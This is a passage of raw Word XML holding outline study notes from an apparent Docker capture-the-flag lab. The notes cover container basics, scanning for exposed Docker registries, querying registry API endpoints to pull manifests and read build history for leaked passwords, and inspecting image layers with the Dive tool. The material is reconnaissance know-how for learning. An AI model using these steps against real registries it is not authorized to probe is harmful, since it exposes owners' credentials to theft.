        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Dock Containers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01698FF3" w14:textId="279AD0C0" w:rsidR="00243659" w:rsidRDefault="00243659" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>containers share computing resources but remain isolated to not conflict with one another</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794726E5" w14:textId="4F01ADFF" w:rsidR="00243659" w:rsidRDefault="00243659" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>not a complete OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7CECB3" w14:textId="2C614EE0" w:rsidR="00243659" w:rsidRDefault="00243659" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run own applications without virtualization</w:t>
      </w:r>
      <w:r w:rsidR="005E0A9D">
        <w:t>, isolated from one another using main operating system resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1BBB25" w14:textId="08457F97" w:rsidR="005E0A9D" w:rsidRDefault="005E0A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Guest Operating System is where resources are used up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3C7E99" w14:textId="7BBAB8E1" w:rsidR="005E0A9D" w:rsidRDefault="005E0A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>traditional VMs require several gigs of space, multiplied by each machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45538DFE" w14:textId="3A91378A" w:rsidR="005E0A9D" w:rsidRDefault="005E0A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Docker Images use base size of around 180MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C8A50" w14:textId="3F9A8948" w:rsidR="005E0A9D" w:rsidRDefault="005E0A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Docker Images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269176B6" w14:textId="63DF6D5A" w:rsidR="005E0A9D" w:rsidRDefault="00C562A2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Containers are created from Images, Images are essentially instruction manuals for Container assembly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D730857" w14:textId="18E671B1" w:rsidR="00C562A2" w:rsidRDefault="00C562A2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>commands such as RUN, COPY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA45F5A" w14:textId="1BB1D1E8" w:rsidR="00C562A2" w:rsidRDefault="00C562A2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability One – Abusing a Docker Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE7F6F" w14:textId="360481B6" w:rsidR="00C562A2" w:rsidRDefault="00C562A2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>What is a Docker Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0EE7E" w14:textId="16D29F8C" w:rsidR="00C562A2" w:rsidRDefault="00E761B6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>used to store and provide published Docker Images for use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293F8904" w14:textId="09624F6A" w:rsidR="00E761B6" w:rsidRDefault="00E761B6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>using repositories, creators of Docker images can switch between multiple versions of applications for easy sharing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D46E3" w14:textId="67BDD3B5" w:rsidR="00E761B6" w:rsidRDefault="00E761B6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DockerHub or private registries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786FA4B6" w14:textId="6EDF5A1E" w:rsidR="00E761B6" w:rsidRDefault="00E761B6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0991233E" w14:textId="4E6EDA4F" w:rsidR="00E761B6" w:rsidRDefault="00E761B6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>docker pull &lt;Image/Image Version:#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB9FAF8" w14:textId="56B8CDC8" w:rsidR="00E761B6" w:rsidRDefault="00E761B6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>docker pull &lt;Image/Image:latest&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABB5F81" w14:textId="7452821E" w:rsidR="00E761B6" w:rsidRDefault="00E761B6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>For these commands to be possible, Docker repositories must store data about every tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C56C0AC" w14:textId="1B0909C1" w:rsidR="00E761B6" w:rsidRDefault="00E761B6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>this can be exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C7E663" w14:textId="4FF9D3F5" w:rsidR="00E761B6" w:rsidRDefault="00E761B6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can be reversed to understand what commands take place when image is built</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4541CF" w14:textId="0A2EEEF2" w:rsidR="00E761B6" w:rsidRDefault="00E761B6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>unpacking layers of data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45915E7B" w14:textId="5B4C457F" w:rsidR="00E761B6" w:rsidRDefault="00E761B6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Interacting with a Docker Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDF966A" w14:textId="79BB0850" w:rsidR="00E761B6" w:rsidRDefault="006D11A9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173AD7A1" w14:textId="60CCDAC3" w:rsidR="006D11A9" w:rsidRDefault="006D11A9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo nmap -sV &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF154B7" w14:textId="08785A41" w:rsidR="006D11A9" w:rsidRDefault="006D11A9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for Docker Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7539BA90" w14:textId="4E607076" w:rsidR="006D11A9" w:rsidRDefault="006D11A9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>typically ports 5000 or 7000 but can vary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C75002" w14:textId="648582C3" w:rsidR="006D11A9" w:rsidRDefault="006D11A9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for API version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F65CB6" w14:textId="5DC27FB3" w:rsidR="006D11A9" w:rsidRDefault="006D11A9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Docker Registries are JSON endpoints, preventing typical website interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A9E3CD" w14:textId="141A4A1C" w:rsidR="006D11A9" w:rsidRDefault="006D11A9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>requires queries via terminal or browser, Postman, Insomnia are better suited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F99CDCB" w14:textId="1DD68216" w:rsidR="006D11A9" w:rsidRDefault="006D11A9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>must understand available routes via Docker Registry Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49494635" w14:textId="0722672D" w:rsidR="006D11A9" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId190" w:history="1">
        <w:r w:rsidR="006D11A9" w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.docker.com/registry/spec/api/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09CABF3A" w14:textId="65549BF2" w:rsidR="006D11A9" w:rsidRDefault="006D11A9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Discovering Repositories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EF7AD6" w14:textId="0A51502F" w:rsidR="006D11A9" w:rsidRDefault="00F44CDB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Begin by sending GET request in Postman to </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;docker</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId191" w:history="1">
        <w:r w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>url:port/v2/_catalog</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="62B9168B" w14:textId="4ACCE4A2" w:rsidR="00F44CDB" w:rsidRDefault="00F44CDB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>list all repos in registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316BED46" w14:textId="51A847D0" w:rsidR="00C22929" w:rsidRDefault="00C22929" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>To Analyze</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD7D7F8" w14:textId="4B471A24" w:rsidR="00C22929" w:rsidRDefault="00C22929" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>need repo name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C2C3F4" w14:textId="5D63709F" w:rsidR="00C22929" w:rsidRDefault="00C22929" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>repo tags published</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE46894" w14:textId="58C228FE" w:rsidR="00C22929" w:rsidRDefault="00C22929" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>will always have at least one, latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D233D84" w14:textId="4EDF342B" w:rsidR="00C22929" w:rsidRDefault="00C22929" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GET request to </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;docker</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId192" w:history="1">
        <w:r w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>url:port/v2/repo/name/tags/list</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43B4939D" w14:textId="0F549B11" w:rsidR="00C22929" w:rsidRDefault="00C22929" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:hyperlink r:id="rId193" w:history="1">
        <w:r w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://docker-rodeo.thm:5000/v2/cmnatic/myapp1/tags/list</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B31751C" w14:textId="6FE0E664" w:rsidR="00C22929" w:rsidRDefault="00C22929" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Grabbing the Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F38B0F" w14:textId="3A5B843E" w:rsidR="00C22929" w:rsidRDefault="00C22929" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enumerate specific repos for manifest file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ED0C26" w14:textId="2E2CDBC6" w:rsidR="00C22929" w:rsidRDefault="00C22929" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>contains various pieces of info about application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F815D2" w14:textId="14ECE7AB" w:rsidR="00C22929" w:rsidRDefault="00C22929" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>manifest file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F803F1F" w14:textId="4542A549" w:rsidR="00C22929" w:rsidRDefault="00C22929" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>contains info about application, size, layers, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CBB2E5" w14:textId="79B92F8C" w:rsidR="00C22929" w:rsidRDefault="00C22929" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GET ex. </w:t>
      </w:r>
      <w:hyperlink r:id="rId194" w:history="1">
        <w:r w:rsidR="0082293F" w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://docker-rodeo.thm:5000/v2/cmnatic/myapp1/manifests/notsecure</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05F35E52" w14:textId="45324915" w:rsidR="0082293F" w:rsidRDefault="0082293F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>“history” key – look for commands that illustrate passwords or other sensitive information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A842B" w14:textId="010175F9" w:rsidR="0082293F" w:rsidRDefault="0082293F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00A1658F">
        <w:t>#2 – Reverse Engineering Docker Images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301773C7" w14:textId="6E11E868" w:rsidR="00A1658F" w:rsidRDefault="00A1658F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Use tools such as Dive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400DDC8F" w14:textId="0C4A6EA6" w:rsidR="00A1658F" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId195" w:history="1">
        <w:r w:rsidR="00A1658F" w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/wagoodman/dive</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C324F65" w14:textId="77777777" w:rsidR="00230140" w:rsidRDefault="00230140" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wget https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_linux_amd64.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E839D1D" w14:textId="411CC39D" w:rsidR="00A1658F" w:rsidRDefault="00230140" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt install ./dive_0.9.2_linux_amd64.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33756403" w14:textId="0789236C" w:rsidR="00A1658F" w:rsidRDefault="00A1658F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>monitors and reassembles how each layer is created and the containers file system at each stage by acting as a MitM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3320A15B" w14:textId="11ADBA69" w:rsidR="00230140" w:rsidRDefault="00230140" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>docker pull &lt;Docker Image:port&gt;/dive/example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D500B8" w14:textId="0F5028DF" w:rsidR="00230140" w:rsidRDefault="00230140" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Find the IMAGE_ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113C9D80" w14:textId="70AA57D6" w:rsidR="00230140" w:rsidRDefault="00230140" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>run docker images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F89DA9" w14:textId="4BEE4C17" w:rsidR="00230140" w:rsidRDefault="00230140" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for name of repo downloaded – IMAGE_ID in third column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE9F935" w14:textId="504C6A33" w:rsidR="00230140" w:rsidRDefault="00230140" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>start dive by running dive with IMAGE_ID</w:t>
      </w:r>
    </w:p>
